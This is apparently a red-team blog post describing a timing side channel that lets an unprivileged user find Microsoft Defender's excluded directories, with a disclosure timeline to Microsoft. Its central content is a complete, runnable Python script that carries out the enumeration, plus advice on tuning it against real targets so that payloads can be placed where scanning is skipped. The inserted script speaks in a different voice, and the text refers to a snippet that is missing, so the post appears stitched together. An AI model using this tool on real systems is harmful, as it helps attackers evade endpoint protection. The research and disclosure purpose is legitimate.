Leaking Microsoft Defender’s exclusions using a timing oracle

Daniel Santos
3 min read · Feb 11, 2024


Around January 2022, it became widely known that unprivileged users could enumerate Microsoft Defender's exclusion rules. A little over a month later, Microsoft silently fixed the issue. Because it didn't meet Microsoft's servicing thresholds, it never received a CVE and may have flown under the radar of less diligent security professionals.

Why is this a problem in the first place? An adversary with low-privileged access to a system running Defender can place or name payloads to match the product's exclusion criteria, bypassing this first line of defense with little effort. For that reason, most endpoint protection solutions require local administrator rights to view the active exclusion set, and being able to enumerate an AV/EDR exclusion list as a non-administrator is a valuable capability for a threat actor operating with low-privileged credentials.

As a Red Team operator, I am constantly faced with situations where disabling, deceiving, or bypassing local security agents is a must, so finding clever ways to do so is a constant exercise. Identifying such techniques is simple and follows the fundamental scientific process of validating hypotheses. For this discovery, the hypothesis was: given a system running Microsoft Defender with all its default features enabled, and an exclusion list containing at least one directory, is there a measurable difference between the time required to write a file to a non-excluded directory and the time required to write it to the excluded directory?

To test the hypothesis, I wrote a tool that, given a list of directories, writes a given number of 512-byte files to each of them and compares the mean time taken to write a file across the provided directories. The tool also takes a "sensitivity" score that dictates how large the time difference must be for a directory to be considered excluded from scanning. Once the first version was coded, I built it, ran it against my system, and... it worked! With a sample size of 1000 files and a sensitivity score of 0.25, the tool identified every directory listed in Defender's exclusion list. I was later able to use the same parameters successfully against different targets, though it is worth noting that these values are not guaranteed to work against every system.

The video below demonstrates the proof-of-concept tool successfully enumerating directories in Defender’s exclusion list.

PoC video

I reported the issue to Microsoft on July 27, 2022, and Microsoft acknowledged the report on December 15, 2022. This information disclosure vulnerability might be addressed in a future patch; however, according to the Microsoft team, "there is no defensible security boundary," so the fix won't ship in a Patch Tuesday update and won't be assigned a CVE.

The PoC tool is available, for educational purposes only, at https://github.com/bananabr/timeexception. When using this technique against a real target, I suggest collecting samples at different hours of the day and under different system load conditions for more accurate results; adjusting the sample size and sensitivity will likely be needed as well.
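As an added illustration of the measurement described above and of the sampling advice just given, the Python script below is my own example, not the author's timeexception tool (whose internals are not shown on this page). It writes a configurable number of 512-byte files to each candidate directory, computes the mean write time per directory, and flags as probably excluded any directory whose mean is at least `sensitivity` below the slowest one. The threshold rule (baseline = slowest probed directory), the round-robin probing order that spreads load variation evenly across directories, and the function names are this example's own assumptions.

```python
import os
import statistics
import time
import uuid
from typing import Dict, Iterable, List

# Defaults mirror the parameters quoted in the post; tune them per target.
SAMPLE_SIZE = 500      # probe files written per directory
FILE_SIZE = 512        # bytes per probe file
SENSITIVITY = 0.20     # fraction below the baseline at which a directory is flagged


def time_one_write(directory: str, payload: bytes) -> int:
    """Create, write and close one fresh file in `directory`; return elapsed ns.

    The timed window covers create + write + close, since an on-access scanner
    does its work on those operations. The probe file is removed afterwards.
    """
    path = os.path.join(directory, f"probe_{uuid.uuid4().hex}.bin")
    try:
        start = time.perf_counter_ns()
        with open(path, "xb") as fh:
            fh.write(payload)
        elapsed = time.perf_counter_ns() - start
    finally:
        if os.path.exists(path):
            os.unlink(path)
    return elapsed


def measure(directories: Iterable[str], samples: int = SAMPLE_SIZE,
            size: int = FILE_SIZE) -> Dict[str, float]:
    """Mean write time (ns) per directory.

    Directories are probed round-robin rather than one after another, so a
    change in system load during the run affects all of them equally. This is
    one way to act on the advice to sample under varying load conditions.
    """
    dirs = list(directories)
    payload = os.urandom(size)   # constructed probe content; any bytes will do
    timings: Dict[str, List[int]] = {d: [] for d in dirs}
    for _ in range(samples):
        for d in dirs:
            timings[d].append(time_one_write(d, payload))
    return {d: statistics.mean(t) for d, t in timings.items()}


def classify(means: Dict[str, float], sensitivity: float = SENSITIVITY) -> Dict[str, bool]:
    """Flag directories whose mean write time is at least `sensitivity` below baseline.

    Baseline is the slowest directory, assumed to be scanned, so the caller
    should include at least one control directory known to be subject to
    real-time scanning (e.g. the user's temp directory). This threshold rule is
    this example's own choice, not necessarily the one the original tool uses.
    """
    if len(means) < 2:
        raise ValueError("need at least two directories to compare against each other")
    baseline = max(means.values())
    threshold = baseline * (1.0 - sensitivity)
    return {d: m < threshold for d, m in means.items()}


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 3:
        sys.exit(f"usage: {sys.argv[0]} DIR1 DIR2 [DIR ...]  (include one known-scanned control directory)")
    targets = sys.argv[1:]
    means = measure(targets, samples=SAMPLE_SIZE, size=FILE_SIZE)
    flags = classify(means, SENSITIVITY)
    for d in targets:
        verdict = "possibly EXCLUDED" if flags[d] else "scanned"
        print(f"{d}: mean {means[d] / 1000:.1f} us -> {verdict}")
```

Because the baseline is the slowest directory, a single unusually slow candidate (a network share, for instance) will mask real exclusions; keep candidates on the same volume and, as the post recommends, repeat the run at different times of day and with different sample sizes before trusting a verdict.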

Update 02/11/2024

This story sat unpublished in my drafts for quite a while, so I decided to test the tool again against my own system to check whether it is still viable. It is!

The snippet below shows that, with a sample size of 500 and a sensitivity of 20%, I was once more able to list ~/Documents/RT as a directory excluded from real-time scanning.
